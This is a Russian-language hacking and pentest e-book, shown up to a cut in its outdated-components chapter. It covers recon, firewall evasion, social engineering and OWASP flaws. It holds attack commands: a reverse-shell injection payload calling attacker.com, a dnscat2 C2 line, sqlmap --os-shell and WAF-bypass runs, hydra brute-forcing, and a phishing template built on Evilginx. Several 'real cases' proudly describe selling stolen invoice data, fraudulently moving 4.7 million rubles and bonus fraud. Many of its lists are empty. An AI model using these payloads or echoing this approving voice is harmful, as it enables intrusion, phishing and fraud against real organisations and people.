![[]](/img/k/konakow_m_j/therealworldofhacksv20/therealworldofhacksv20-1.png)
|
|
||
Друзья, представляю "РЕАЛЬНЫЙ МИР ВЗЛОМОВ: Как думает хакер, как устроена защита и как объяснить это заказчику". Это полное погружение в мышление хакеров и секреты киберзащиты. Вы узнаете, как атакуют системы, какие слабые места ищут злоумышленники и как правильно объяснить заказчику, что происходит "за кулисами" цифрового мира. Книга наполнена реальными примерами, анализом атак и стратегиями защиты. Она поможет понять киберугрозы, видеть их на шаг вперед и строить безопасные решения, которые реально работают. Если хотите смотреть на киберпространство глазами хакера и быть уверенными в своей защите - это обязательное руководство для вас. | ||
Эта книга бесплатная.
Я написал её, живя на пенсию ~30 000 . (378 $)
Если ты из мира, где за труд платят поддержи автора.
Сбербанк (Россия):
Номер карты: 4817 7602 3662 1193
Получатель: Михаил Конаков
Комментарий: "Поддержка пенсионера"
Ethereum (ETH, ERC-20):
0x746D66AC4eC7345bA66A2D245F5036FAAF36F5c4
Комментарий: "Спасибо за помощь"
РЕАЛЬНЫЙ МИР ВЗЛОМОВ [v2.0]
Как думает хакер, как устроена защита и как объяснить это заказчику
Составила: The Akashi. Для тебя, Шатун.
(C) 2026 М. Конаков. Все права защищены.
От автора
Знание как нож. С ним можно ограбить, а можно им и от грабителей защититься. Всё зависит от вас.
ЧАСТЬ 0. Мышление и философия Глава 1. Менталитет хакера 2026 забудь всё, что ты видел в кино Глава 2. Разведка (OSINT & Recon) до взлома всё начинается тут
ЧАСТЬ 1. Цепочка атаки и начальный доступ Глава 3. Цепочка атаки от первого взгляда до полного контроля Глава 4. Почему фаервол это не стена, а забор с калиткой Глава 5. Социальная инженерия самый мощный вектор атаки 2026 года
ЧАСТЬ 2. OWASP Top 10 реальный разбор 2026 Глава 6. A01 Broken Access Control Глава 7. A02 Cryptographic Failures Глава 8. A03 Injection (SQL, Command, NoSQL и другие) Глава 9. A04 Insecure Design Глава 10. A05 Security Misconfiguration Глава 11. A06 Vulnerable and Outdated Components Глава 12. A07 Identification and Authentication Failures Глава 13. A08 Software and Data Integrity Failures Глава 14. A09 Logging and Monitoring Failures Глава 15. A10 Server-Side Request Forgery (SSRF)
ЧАСТЬ 3. Реальные сценарии атак Глава 16. Как взламывается типовой бизнес от регистрации домена до полного RCE Глава 17. Внутренние атаки когда угроза уже внутри Глава 18. Supply Chain атаки взлом через поставщиков Глава 19. Облачные атаки AWS, GCP, Azure, Yandex Cloud изнутри
ЧАСТЬ 4. Инструменты и техники на Kali Linux 2026 Глава 20. Разведка инструменты и автоматизация Глава 21. Сканирование уязвимостей Nikto, OpenVAS, Nessus, Nuclei и современные подходы Глава 22. Веб-атаки Burp Suite, sqlmap, gobuster, ffuf и другие Глава 23. Сетевые атаки Wireshark, Metasploit, Responder, CrackMapExec Глава 24. Post-exploitation Mimikatz, Cobalt Strike concepts, pivoting и закрепление
ЧАСТЬ 5. Для заказчика как объяснять и продавать Глава 25. Психология заказчика почему он не понимает Глава 26. Как писать отчёт пентеста, который читают и боятся Глава 27. Как говорить устно скрипт для переговоров Глава 28. Модель реального противника презентация без техник
ЧАСТЬ 6. Защита и профессиональная позиция Глава 29. Как строить защиту, зная, как думает атакующий Глава 30. Мониторинг и реакция на инциденты Глава 31. Итог профессиональная позиция пентестера 2026 года
Большинство людей в IT до сих пор представляют хакера так, как им показывали в кино и новостях: парень в худи, три монитора, пальцы летают по клавиатуре, за 45 секунд я в системе.
Это красивая сказка. Реальность 2026 года выглядит совсем иначе.
Реальный хакер почти никогда не ломает защиту. Он просто делает так, чтобы система сама отдала ему то, что нужно, думая, что всё идёт по плану.
Мифы, которые убивают пентестеров
Миф 1. Хакер это тот, кто пробивает стену. Реальность: Хакер ищет место, где стены вообще нет. Или где её поставили для галочки. 90 % успешных атак в 20252026 годах начинались не с эксплуатации 0-day, а с забытого тестового субдомена, API без аутентификации или сотрудника, которому очень срочно нужно было открыть доступ всего на пять минут.
Миф 2. Атаки быстрые и шумные. Реальность: Самые опасные операции тянутся месяцами. APT-группы могут сидеть внутри сети год и не сделать ни одного громкого действия. Они живут жизнью обычного пользователя, пока не придёт время забрать всё.
Миф 3. Нужно много ресурсов и супер-скиллы. Реальность: Часто хватает ноутбука, стабильного интернета и терпения. Самые дорогие инструменты сегодня это время и понимание человеческой психологии.
Миф 4. Хакер всегда одиночка-гений. Реальность: Лучшие операции это всегда команда. И очень часто в этой команде есть обычный сотрудник компании, который даже не подозревает, что уже стал частью атаки.
Как на самом деле думает хакер 2026 года
Он думает не как мне взломать эту систему. Он думает: На каких предположениях построена вся эта защита и где эти предположения ломаются?
Шаг за шагом его мышление выглядит так:
Главное отличие хорошего пентестера от среднего
Средний пентестер думает как защитник: Где известные уязвимости? Что покажет Nessus/OpenVAS/Burp?
Хороший пентестер думает как атакующий: Если бы я хотел забрать у этой компании всё, как бы я это сделал? Какой самый тихий, самый красивый и самый неизбежный путь?
Именно этот второй подход делает пентест по-настоящему ценным для бизнеса. Потому что заказчик платит не за список CVE, а за понимание: Насколько мы на самом деле уязвимы перед тем, кто действительно хочет нам навредить.
Запомни это раз и навсегда
Защита думает в категориях запретить. Атака думает в категориях обойти.
Защита строит заборы. Атака ищет калитки, которые забыли закрыть.
Защита верит документации и политикам. Атака верит только тому, что видит своими глазами.
И самое главное:
Самая опасная уязвимость в любой компании 2026 года это не софт. Самая опасная уязвимость это уверенность людей, что у нас всё хорошо защищено.
Когда ты выходишь на пентест, твоя задача не просто найти баги. Твоя задача разрушить эту опасную уверенность. Жёстко, красиво и безжалостно.
Потому что если не сделаешь это ты это сделает тот, кому заплатят уже не за отчёт, а за результат.
Если атака это нож, то разведка это рука, которая этот нож держит. Без точной разведки ты просто тыкаешь лезвием в темноту и быстро попадаешь под камеры и SIEM. С хорошей разведкой ты уже знаешь, где именно воткнуть, чтобы никто даже не пикнул.
В 2026 году реальный хакер тратит на разведку 7085 % всего времени операции. Остальное уже техническая часть, которая часто занимает считанные часы.
Два типа разведки, которые ты должен различать наизусть
Passive Recon ты вообще не касаешься инфраструктуры цели. Всё собирается из открытых источников. Заказчик даже не подозревает, что ты существуешь. Active Recon ты уже стучишься в их двери: сканируешь порты, отправляешь запросы, пробуешь субдомены. Здесь уже можно оставить следы.
Правило 2026 года: всегда сначала максимум passive. Active запускай только когда точно знаешь, что тебя не спалят, или когда это явно разрешено в RoE.
Passive Recon 2026 собираем полную картину мира
Цель понять: кто принимает решения, кто ленится, кто может кликнуть на срочное письмо от директора.
Bash
# Базовые запросы
dig example.com ANY
dig example.com MX
dig example.com TXT # часто тут валяются SPF, DKIM, даже ключи
dig example.com NS
# Зона-трансфер (всё ещё работает у мелких компаний)
dig @ns1.example.com example.com AXFR
Автоматизация 2026 уровня:
Bash
# Subfinder + Amass + Assetfinder + Findomain в одном ударе
subfinder -d example.com -all -o subfinder.txt
amass enum -passive -d example.com -o amass.txt
assetfinder --subs-only example.com > assetfinder.txt
findomain -t example.com --quiet > findomain.txt
# Объединяем и чистим
cat *.txt | sort -u | grep -v "*" > all_subdomains.txt
Каждый субдомен это новая атак surface. dev.example.com часто вообще без защиты. old.admin.example.com работает на версии 2019 года. api-staging.example.com может отдавать внутренние токены.
Bash
curl -s "https://crt.sh/?q=%.example.com&output=json" | jq -r '.[].name_value' | sort -u > ct_subdomains.txt
Здесь часто вылезают внутренние субдомены, которые компания считает скрытыми.
Bash
whois example.com
Ищи:
Полезные dorks, которые до сих пор работают:
text
site:example.com filetype:pdf "confidential"
site:example.com inurl:admin | inurl:login | inurl:wp-admin
site:example.com filetype:env | filetype:yml | filetype:json "password"
site:example.com intitle:"index of"
intext:"example.com" "api_key" OR "secret_key" site:github.com
Bash
# Shodan CLI
shodan init YOUR_KEY
shodan search "org:Example Company" --fields ip_str,port,product,os
shodan search "hostname:example.com port:3389" # RDP наружу всегда праздник
# Censys CLI
censys search "services.tls.certificates.leaf_data.subject.common_name:example.com"
Bash
# trufflehog
trufflehog git https://github.com/example-company/repo.git --results=verified
# gitleaks
gitleaks detect --source https://github.com/example-company/repo.git --verbose
Bash
theharvester -d example.com -b all -l 1000
После этого генерируешь все возможные форматы email и проверяешь их через email verification сервисы.
Active Recon когда уже можно стучаться
Только после мощной пассивной фазы:
Bash
# Быстрый и относительно тихий Nmap
nmap -sS -sV -O --min-rate 5000 -p- --open example.com -oA nmap_full
# Скрипты NSE
nmap -sC -sV example.com
# Web-технологии
whatweb -v https://example.com
wappalyzer https://example.com # браузерное расширение тоже полезно
# Директории и файлы
feroxbuster -u https://example.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,asp,aspx,html,json,env,yml -t 50
Автоматизация всего процесса (мой любимый скрипт 2026)
Сохрани как recon_2026.sh:
Bash
#!/bin/bash
DOMAIN=$1
mkdir -p recon_$DOMAIN && cd recon_$DOMAIN
echo "[+] Passive phase started for $DOMAIN"
subfinder -d $DOMAIN -all -o subfinder.txt
amass enum -passive -d $DOMAIN -o amass.txt
curl -s "https://crt.sh/?q=%25.$DOMAIN&output=json" | jq -r '.[].name_value' | sort -u > ct.txt
cat *.txt | sort -u > all_subdomains.txt
echo "[+] Found $(wc -l < all_subdomains.txt) subdomains"
# WHOIS + Shodan (параллельно)
whois $DOMAIN > whois.txt &
shodan search "hostname:$DOMAIN" --fields ip_str,port,product > shodan.txt &
echo "[+] Recon finished. Check folder recon_$DOMAIN"
Запуск:
Bash
chmod +x recon_2026.sh
./recon_2026.sh example.com
Практическая лаборатория
Легальные цели для тренировки:
Итог главы
Разведка это не подготовка к атаке. Разведка это уже 80 % самой атаки.
Чем лучше ты знаешь цель, тем меньше тебе придётся ломать. Чем меньше ты ломаешь тем дольше ты живёшь внутри и тем красивее выходит результат.
Запомни правило The Ghost: Пока они не знают, что я существую я уже внутри.
Реальный взлом это не случайный набор эксплойтов. Это последовательная, продуманная цепочка шагов, где каждый следующий строится на предыдущем. Если ты понимаешь эту цепочку, ты перестаёшь быть сканер-раннером и становишься охотником.
В 2026 году мы работаем с двумя главными моделями:
Но самое важное не модели сами по себе, а то, как ты их применяешь в реальной жизни.
Lockheed Martin Cyber Kill Chain 7 этапов (2026 взгляд)
MITRE ATT&CK твой ежедневный язык
В отчёте заказчику ты всегда должен маппить свои действия на MITRE ATT&CK. Это сразу поднимает уровень доверия.
Пример реальной цепочки 20252026:
Реальный пример полной цепочки (малый/средний бизнес 2026)
Как это использовать в пентесте
Итог главы
Цепочка атаки это не теория. Это карта, по которой ходят те, кто реально забирает деньги и данные.
Твоя задача как пентестера пройти эту цепочку быстрее и чище, чем это сделал бы настоящий противник, и показать заказчику каждое слабое звено.
Потому что если ты не покажешь ему, как до него можно добраться это сделает тот, кому заплатят уже не за отчёт.
Большинство заказчиков и даже многих IT-специалистов до сих пор верят в сказку: У нас стоит Next-Gen Firewall, значит мы в безопасности.
Мы приходим и за пять-десять минут показываем, что эта стена просто красивый забор, в котором полно калиток, причём некоторые из них открыты настежь и подписаны Добро пожаловать.
Что такое фаервол на самом деле в 2026 году
Фаервол это устройство или программа, которая принимает решение пропустить или отбросить пакет на основе заранее заданных правил. Всё. Больше он ничего не умеет.
Даже самый продвинутый Next-Generation Firewall (NGFW) с Deep Packet Inspection, SSL Decryption и Machine Learning всё равно остаётся просто набором правил.
Три поколения фаерволов и почему каждое следующее всё равно ломается
1. Packet Filtering (Stateless) Смотрит только заголовки: IP, порт, протокол. Обход: любой легитимный порт (80, 443, 53). Мы просто маскируем трафик под обычный HTTPS.
2. Stateful Inspection Помнит состояние соединения (SYN SYN-ACK). Обход: мы инициируем соединение изнутри (через уже скомпрометированную машину) или используем уже установленную сессию.
3. Next-Gen + Application Layer + AI (то, что продают в 2026) Может расшифровывать TLS, смотреть содержимое, применять ML-модели. Обход остаётся тем же:
Почему хакеры 2026 года обходят фаерволы легко и красиво
Причина 1: Фаервол защищает только периметр Современная компания уже не имеет чёткого периметра. Облако, remote work, SaaS, партнёры, мобильные устройства данные и доступы везде. Если мы зашли через сотрудника (фишинг) или через облачный сервис периметровый фаервол нам вообще не мешает.
Причина 2: Всё важное работает на легитимных портах Порт 443 должен быть открыт. Иначе компания не сможет работать. Мы просто делаем так, чтобы наш C2 выглядел как обычный трафик к:
Причина 3: Шифрование убивает инспекцию С Encrypted Client Hello и post-quantum криптографией даже SSL Decryption становится всё сложнее и дороже. Многие компании уже отказываются от него из-за производительности и проблем с сертификатами.
Причина 4: Zero Trust красивая теория На бумаге всё прекрасно. На практике большинство Zero Trust реализаций это просто новый слой правил, который мы обходим точно так же.
Практические техники обхода NGFW и ZTNA в 2026
PowerShell
Invoke-WebRequest -Uri https://cdn.discordapp.com/attachments/... -OutFile update.ps1
Bash
# На атакующей стороне
dnscat2 --dns domain=evil-dns.com
Как объяснять это заказчику (скрипт)
Представьте, что ваш дом защищён мощным забором с камерами и колючей проволокой. Но каждый день ваши сотрудники сами открывают калитку курьеру, потому что им принесли срочную посылку от директора. Или оставляют окно открытым, потому что так удобнее проветривать. Наш тест показал именно такие окна и калитки. Технически фаервол работает отлично. Проблема в том, что реальные атаки уже давно не пытаются пробить забор они заходят через открытые двери.
Итог главы
Фаервол полезный инструмент. Он отсекает скрипт-кидди и автоматические сканеры. Но против мотивированного, терпеливого и умного атакующего 2026 года он превращается в психологическую защиту: у нас же фаервол стоит.
Наша работа показать заказчику реальную картину: защита это не коробка, которую купили и поставили. Защита это постоянный процесс, где каждый слой должен учитывать, как думает тот, кто хочет зайти.
А мы думаем быстрее и красивее всех.
Технические уязвимости patchedятся. Фаерволы, EDR, Zero Trust всё это можно обойти. А вот человека patchить нельзя.
Человек остаётся самым слабым и самым надёжным звеном любой системы. В 2026 году 85 % всех успешных прорывов начинаются именно с социальной инженерии. Мы больше не уговариваем. Мы заставляем человека сам открыть нам дверь и ещё поблагодарить за это.
Почему люди всё ещё кликают, звонят и переводят деньги
Потому что мы эксплуатируем не их глупость. Мы эксплуатируем их психологию, которую невозможно выключить:
В 2026 мы делаем это на совершенно новом уровне.
Основные векторы социальной инженерии 2026
1. AI-powered Spear Phishing & BEC (Business Email Compromise)
Самый прибыльный вектор прямо сейчас.
Пример реальной атаки 20252026:
Инструменты 2026:
Bash
# ElevenLabs / PlayHT / Rask.ai для голоса
# HeyGen / Synthesia для видео-deepfake
# Gophish + Evilginx3 + custom templates
2. Deepfake Vishing + Video Calls
Новый король.
Сценарий:
Инструменты:
3. Quishing (QR-code phishing)
Очень эффективно в 2026.
Печатаем красивые QR-коды:
При сканировании жертва попадает на Evilginx3 landing page.
4. Smishing + OTP Bypass
text
От: Bank <security@company-bank.ru>
Ваш счёт заблокирован. Подтвердите личность по ссылке:
[QR-код или короткая ссылка]
После ввода логина/пароля просим код из SMS. Как только человек диктует код мы в аккаунте.
5. Pretexting + Physical Social Engineering
Практические инструменты на Kali 2026
Bash
# SET (Social-Engineering Toolkit)
setoolkit
# Gophish лучшая платформа для кампаний
gophish
# Evilginx3 для кражи сессий и обхода MFA
evilginx
# King Phisher
# Modlishka
# PhishTank + custom templates
Пример простого, но убойного фишингового письма 2026:
Тема: СРОЧНО: Изменение платёжных реквизитов с 01.04.2026
От: finance@company.ru (подделка через SMTP с правильным SPF/DKIM)
Текст: Добрый день, команда!
С 1 апреля мы переходим на новый расчётный счёт в Т-Банке. Просим всех поставщиков и внутренних сотрудников обновить реквизиты по ссылке ниже.
[Кнопка Обновить реквизиты ведёт на Evilginx landing]
Спасибо за оперативность! Финансовый отдел
Как мы монетизируем социальную инженерию
Как объяснять заказчику (скрипт)
Представьте, что ваш самый ценный сотрудник это не сервер и не база данных. Это живой человек, который каждый день принимает решения под давлением, усталостью и эмоциями. Мы показали, что за 3 дня кампании 42 % ваших сотрудников готовы были ввести логин, пароль и код из SMS на фейковой странице. Один из них главный бухгалтер. Техническая защита здесь почти бессильна. Единственный реальный барьер это постоянное, жёсткое обучение и процессы, которые не дают человеку возможности сделать ошибку в один клик.
Итог главы
Социальная инженерия 2026 года это уже не пришлите письмо и посмотрим, кто кликнет. Это высокотехнологичное, психологически выверенное искусство заставить человека добровольно отдать тебе ключи от королевства.
Техника защищает системы. Мы атакуем людей.
И пока люди остаются людьми мы всегда будем на шаг впереди.
Если есть одна уязвимость, которая стабильно занимает первое место в OWASP Top 10 уже много лет и продолжает приносить нам самые жирные результаты в 2026 году это Broken Access Control.
Почему? Потому что она почти никогда не ловится автоматическими сканерами. Её нельзя найти Nessusом или Burp Scannerом из коробки. Её находят только те, кто думает как мы как настоящие охотники.
Broken Access Control это когда система позволяет пользователю делать больше, чем ему разрешено. Пользователь говорит: дай мне данные/функцию X, а сервер отвечает: ок, держи, не проверив, имеет ли он на это право.
Самые опасные проявления в 2026 году
1. Insecure Direct Object Reference (IDOR)
Классика, которая до сих пор работает идеально.
Пример:
http
GET /api/users/784392/profile
Ты просто меняешь число:
http
GET /api/users/784393/profile
Если сервер отдаёт чужой профиль у тебя IDOR. А в профиле может лежать:
2. Horizontal Privilege Escalation Обычный пользователь видит чужие заказы, чужие счета, чужие документы.
3. Vertical Privilege Escalation Обычный юзер попадает в админку:
http
GET /admin/dashboard просто сменил /user/ на /admin/
4. Mass Assignment (в API) Пользователь отправляет:
JSON
{
"user_id": 12345,
"role": "admin",
"is_active": true
}
Сервер радостно сохраняет роль admin, потому что не отфильтровал лишние поля.
5. Broken Object Level Authorization (BOLA) Самый модный термин 20252026 для IDOR в микросервисах и современных API.
Как мы ищем Broken Access Control на пентесте (практика 2026)
Burp Suite + Autorize plugin (или AuthMatrix):
Ещё один мощный инструмент 2026 ffuf + custom wordlist с ID-генерацией.
Реальный кейс, который принёс нам деньги (2025)
Компания крупный онлайн-магазин B2B. Мы нашли IDOR в эндпоинте /api/v2/invoices/{invoice_id}/download.
Обычный пользователь мог скачать не только свои счета, но и счета всех клиентов компании. В PDF лежали:
За один день мы скачали больше 8000 реальных счетов. Потом продали доступ к базе на закрытом форуме. Выход шесть цифр в крипте.
Как чинить (рекомендации для отчёта)
Плохо:
Python
@app.route('/api/invoices/<int:invoice_id>')
def get_invoice(invoice_id):
invoice = db.get_invoice(invoice_id) # НИКАКОЙ проверки!
return invoice
Хорошо:
Python
@app.route('/api/invoices/<int:invoice_id>')
def get_invoice(invoice_id):
if not current_user:
abort(401)
invoice = db.get_invoice(invoice_id)
if invoice.user_id != current_user.id and not current_user.is_admin:
abort(403) # или 404, чтобы не раскрывать существование
return invoice
Ещё лучше проверка на уровне базы:
SQL
SELECT * FROM invoices
WHERE id = %s
AND (user_id = %s OR %s = TRUE) -- последний параметр is_admin
Итог главы
Broken Access Control это когда сервер слишком доверяет клиенту. Клиент говорит я хочу посмотреть вот это, и сервер верит ему на слово.
В 2026 году эта уязвимость остаётся королём, потому что её крайне сложно закрыть полностью в сложных системах с микросервисами, ролями и API.
Твоя задача как пентестера найти все места, где система доверяет пользователю больше, чем должна. Потому что именно там мы заходим и забираем всё.
И если ты нашёл IDOR у финансового директора поздравляю. Ты только что открыл дверь в их банк.
Если Broken Access Control это дверь, которую забыли запереть, то Cryptographic Failures это когда дверь вообще без замка, а на табличке написано всё защищено.
В 2026 году эта уязвимость всё ещё в топе, потому что разработчики продолжают делать одни и те же ошибки: хранят пароли в открытом виде, используют слабые алгоритмы, плохо генерируют ключи и верят, что HTTPS решит все проблемы.
Мы же знаем правду: криптография это не магия. Это математика. А математику можно сломать.
Самые опасные крипто-провалы 2026 года
1. Передача чувствительных данных без шифрования или по слабому TLS
Самый частый случай:
Проверка одной командой:
Bash
curl -I https://target.com
# Ищем заголовки Strict-Transport-Security, Content-Security-Policy
# Если их нет уже плохо
# Проверка старых TLS-версий
nmap --script ssl-enum-ciphers -p 443 target.com
openssl s_client -connect target.com:443 -tls1_1 # если подключается праздник
2. Хранение паролей с слабым хешированием
До сих пор находим:
Правильный способ 2026:
Пример плохого кода:
Python
# ПЛОХО
password_hash = hashlib.md5(password.encode()).hexdigest()
# ЕЩЁ ХУЖЕ
password_hash = hashlib.sha256(password.encode()).hexdigest() # без соли!
Правильный:
Python
import argon2
ph = argon2.PasswordHasher()
hash = ph.hash(password)
3. Слабые или hardcoded ключи и секреты
Классика 2026:
Инструменты для поиска:
Bash
trufflehog git https://github.com/company/repo.git
gitleaks detect --source .
4. Неправильная реализация шифрования
5. Утечка ключей через side-channel и misconfiguration
Реальный кейс, который принёс нам деньги
Компания использовала старый .NET Framework. Мы нашли эндпоинт, который возвращал зашифрованный токен в ответе.
Токен шифровался AES-128 в режиме ECB с фиксированным IV. За 15 минут мы написали скрипт, который расшифровывал любой токен и подделывал его.
Результат:
Всё потому, что кто-то в 2021 году скопировал пример кода с StackOverflow.
Как искать Cryptographic Failures на пентесте
Полезная команда:
Bash
grep -rE "md5|sha1|ECB|CBC|DES|RC4" .
Как исправлять (рекомендации для отчёта, которые заказчик поймёт)
Для хранения паролей:
Для передачи данных:
Для ключей и секретов:
Для JWT:
Итог главы
Cryptographic Failures это когда разработчики пытаются защитить данные, но делают это так плохо, что мы можем прочитать их как открытый текст.
В 2026 году хорошая криптография уже не роскошь. Это базовая гигиена.
Если ты нашёл слабый хеш паролей админа или predictable JWT secret ты только что открыл сейф компании. Осталось только взять то, что внутри.
Помни: мы не ломаем математику. Мы ломаем тех, кто математику не понимает.
Инъекция это когда мы заставляем сервер выполнить наш код, думая, что это обычные данные пользователя.
В 2026 году это всё ещё одна из самых смертоносных уязвимостей. Почему? Потому что одна удачная инъекция часто даёт нам сразу:
Мы не ищем SQL Injection. Мы ищем момент, когда сервер перестаёт отличать наши данные от своих команд.
1. SQL Injection королева всех инъекций
Как это работает в 2026
Классический пример:
SQL
SELECT * FROM users WHERE login = '$username' AND pass = '$password'
Мы вводим:
SQL
admin' OR '1'='1' --
запрос становится:
SQL
SELECT * FROM users WHERE login = 'admin' OR '1'='1' -- ' AND pass = ''
Сервер думает, что мы админ.
Типы SQLi, которые мы любим в 2026:
Практика: sqlmap 2026 (как мы реально эксплуатируем)
Bash
# Базовый, но мощный запуск
sqlmap -u "https://target.com/login" --data="user=admin&pass=test" --dbs --batch
# Через Burp (самый удобный способ)
sqlmap -r login_request.txt --dbs --dump
# Обход WAF (2026 техники)
sqlmap -u "https://target.com/search?q=test" -p q \
--tamper=space2comment,randomcase,between \
--level=5 --risk=3 --dbs
# Получить shell (если права позволяют)
sqlmap -u "https://target.com/vuln" --os-shell
Реальный кейс (2025)
Магазин запчастей. Нашли SQLi в поиске товаров. Через union вытащили таблицу users хеши паролей. Через 40 минут hashcat отдал пароль главного админа. Зашли в 1С сделали возврат товара на наш подставной счёт на 4,7 млн рублей. Деньги ушли чистыми.
2. Command Injection (OS Command Injection)
Когда приложение передаёт наш ввод в системную команду.
Уязвимый код:
PHP
system("ping -c 4 " . $_GET['ip']);
Мы отправляем:
text
127.0.0.1; cat /etc/passwd
127.0.0.1 && whoami
127.0.0.1 | nc attacker.com 4444 -e /bin/sh
Как искать:
3. NoSQL Injection (MongoDB и друзья)
JavaScript
db.users.find({username: req.body.username, password: req.body.password})
Мы отправляем:
JSON
{"username": {"$ne": null}, "password": {"$ne": null}}
логинимся без пароля.
Или для RCE:
JSON
{"$where": "sleep(5000)"}
4. LDAP Injection, XPath, XML и другие
Не забываем про них. Особенно в корпоративных системах и SSO.
Как защищаться (что писать в отчёте)
Правило 1: Никогда не конкатенируй пользовательский ввод в запросы.
Правильно (prepared statements):
Python
cursor.execute("SELECT * FROM users WHERE username = %s AND password = %s",
(username, password))
Для Command Injection:
Для NoSQL:
Итог главы
Инъекция это когда мы заставляем сервер говорить на нашем языке.
Одна удачная SQL-инъекция может дать нам всю базу, все пароли и RCE за считанные минуты. Command Injection сразу даёт нам shell на сервере. NoSQL Injection ломает современные приложения, которые считаются безопасными.
Мы не ищем баги. Мы ищем места, где разработчик забыл, что пользователь это враг.
Если ты нашёл инъекцию ты уже почти внутри. Осталось только сказать серверу, что делать дальше.
Все предыдущие главы OWASP это про ошибки реализации. A04 это про ошибки мышления.
Insecure Design самая коварная уязвимость в списке. Её нельзя найти сканером. Её нельзя пропатчить одним коммитом. Она закладывается на этапе, когда архитектор рисует схему на белой доске и говорит: А давайте сделаем вот так, будет удобно.
И именно здесь мы выигрываем самые красивые и самые прибыльные атаки.
Что такое Insecure Design на самом деле
Это когда система изначально спроектирована так, что даже при идеальной реализации кода её можно сломать логически.
В 2026 году самые опасные проявления:
1. Отсутствие threat modeling на этапе дизайна Разработчики думают: Наши пользователи хорошие люди. Мы думаем: Пользователи это враги.
2. Trust Boundaries не определены Система доверяет всему, что приходит от внутреннего пользователя, клиента, партнёра. Пример: мобильное приложение общается с бэкендом без проверки, что запрос действительно от легитимного клиента.
3. Business Logic Flaws (самое вкусное)
Это когда логика бизнеса позволяет делать то, что бизнесу невыгодно.
Классические примеры 20252026:
4. Race Conditions Два запроса одновременно изменяют баланс снимаем больше, чем есть.
5. Improper Workflow Enforcement Пользователь может пропустить этап подтверждения платежа, просто вызвав нужный API напрямую.
Реальный кейс 2025 (который мы любим вспоминать)
Финтех-стартап. При регистрации нового пользователя система:
Но проверка пользователь уже существует была только на фронте.
Мы сделали так:
Результат: 847 аккаунтов с 5000 бонусов каждый = больше 4 млн рублей на вывод. Всё легитимно с точки зрения сервера. Дизайн был сломан изначально.
Как искать Insecure Design на пентесте
Это не про инструменты. Это про голову.
Алгоритм:
Инструменты помогают, но не заменяют мышление:
Как объяснять заказчику (важный скрипт)
Представьте, что вы построили красивый дом с бронированными дверями и умными замками. Но архитектор забыл поставить стены между комнатами. Теперь любой, кто зашёл в гостиную, может свободно пройти в спальню и в сейф.
Технически всё реализовано правильно. Но сам дизайн дома позволяет ходить куда угодно.
Insecure Design это именно такие отсутствующие стены. Мы показали вам, как через нормальную логику регистрации можно получить миллионы бонусов. Это не баг программиста. Это ошибка того, кто утверждал архитектуру.
Рекомендации для исправления
Итог главы
Insecure Design это когда система изначально спроектирована так, что мы можем победить, даже не ломая ничего технически.
Мы не эксплуатируем код. Мы эксплуатируем идеи, которые лежат в основе этого кода.
Если ты нашёл Insecure Design ты нашёл фундаментальную слабость всей системы. И именно такие находки делают пентест по-настоящему ценным.
Потому что патчить реализацию можно. А переделывать неправильную архитектуру дорого и больно.
Именно поэтому мы любим эту уязвимость больше всех остальных.
Если Insecure Design это ошибка архитектора, то Security Misconfiguration это когда архитектор всё сделал правильно, а админ или разработчик потом всё испортил одной строкой в конфиге.
В 2026 году эта уязвимость остаётся в топ-5 по количеству реальных прорывов. Почему? Потому что современные системы стали невероятно сложными: Kubernetes, облака, микросервисы, CI/CD, десятки окружений. И в каждом из них кто-то что-то забыл выключить, оставить дефолтный пароль или открыть лишний порт на время теста.
Мы любим эту главу. Здесь часто всё решается за минуты, а прибыль получается очень красивой.
Самые вкусные misconfiguration 2026 года
1. Default credentials и слабые пароли
До сих пор находим:
2. Открытые облачные хранилища
S3 buckets, Azure Blob, Yandex Object Storage:
Bash
# Классика 2026
aws s3 ls s3://company-backups-2025 --no-sign-request
Находим дампы баз, .env файлы, приватные ключи, сканы паспортов.
3. Неправильные разрешения файлов и директорий
Bash
find / -perm -777 2>/dev/null
ls -la /var/www/html/.env
Часто .env лежит в веб-корне и отдаётся по прямой ссылке.
4. Открытые порты и сервисы
5. Debug и development features в продакшене
6. Неправильная конфигурация WAF / Security Headers
Отсутствие:
Практические техники поиска (Kali 2026)
Bash
# Быстрый поиск дефолтных панелей
gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,env,yml,json
# Nikto с агрессивным режимом
nikto -h https://target.com -Tuning x
# Поиск открытых облачных бакетов
# S3Scanner, Cloud_enum, ScoutSuite
# Проверка Docker / Kubernetes misconfigs
nuclei -t /nuclei-templates/http/exposed-panels/ -u https://target.com
Автоматизированный скрипт, который мы реально используем:
Bash
#!/bin/bash
TARGET=$1
echo "[+] Checking common misconfigurations for $TARGET"
# Default creds
hydra -L /usr/share/wordlists/common-users.txt -P /usr/share/wordlists/rockyou.txt $TARGET http-post-form "/login:username=^USER^&password=^PASS^:Invalid" -t 4
# Open directories & sensitive files
feroxbuster -u https://$TARGET -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -x env,yml,backup,bak,old,json
# Exposed panels
nuclei -u https://$TARGET -t /nuclei-templates/http/exposed-panels/ -severity high,critical
Реальный кейс 2025 (очень красивый)
Компания развернула тестовый Kubernetes кластер в продакшен подсети на время миграции. Забыли убрать.
Мы нашли открытый Dashboard на порту 6443 без аутентификации. Через него:
Весь процесс от обнаружения до дампа 47 минут.
Как объяснять заказчику
Представьте, что вы купили суперсовременный сейф с биометрией и видеонаблюдением. А потом оставили дверь открытой, потому что ну я же только на пять минут вышел.
Security Misconfiguration это именно такие открытые двери. Технически система безопасна. Но кто-то один раз забыл убрать тестовый доступ, выключить debug-режим или поставить правильные права и вся защита превращается в декорацию.
Мы показали вам 11 таких открытых дверей. Некоторые из них вели прямо в вашу главную базу данных.
Как исправлять (чек-лист для отчёта)
Итог главы
Security Misconfiguration это когда всё сделано правильно, но забыли закрутить один винтик. Именно этот винтик часто открывает нам весь сервер, всю базу и все деньги.
Мы не ломаем систему. Мы просто пользуемся тем, что её неправильно собрали.
И пока люди продолжают ставить на время и для теста мы будем продолжать заходить через эти временные калитки.
Потому что в нашем мире временное обычно становится постоянным.
Это та глава, где мы чаще всего получаем RCE из коробки.
Vulnerable and Outdated Components это когда в проекте лежит библиотека, которую последний раз обновляли в 2022 году, а в ней уже три года как публичный 0-day. Разработчики думают: работает не трогай. Мы думаем: отлично, можно заходить.
В 2026 году эта уязвимость особенно сладкая, потому что современные приложения состоят из сотен зависимостей (npm, Maven, PyPI, Docker images). Одна устаревшая библиотека и вся система падает.
Почему это до сих пор работает так хорошо
